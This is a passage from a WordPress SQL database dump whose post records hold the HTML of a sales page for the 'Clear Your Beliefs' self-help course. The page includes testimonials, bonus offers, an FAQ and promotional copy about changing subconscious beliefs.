of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>\r\njQuery(document).ready(function() { \r\nvar is_chrome = window.chrome; \r\n if (is_chrome) { \r\njQuery(''h5.hdr'').css(''font'', ''51px/75px ''Arial Narrow'', Arial, sans-serif!important'');\r\n jQuery(''h5.hdr'').animate({\r\n    fontSize: ''51px''\r\n }, 100);\r\n } \r\n});\r\n</script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:55:50', '2014-06-18 02:55:50', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1011, 4194, '2014-06-17 21:58:41', '2014-06-18 02:58:41', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" 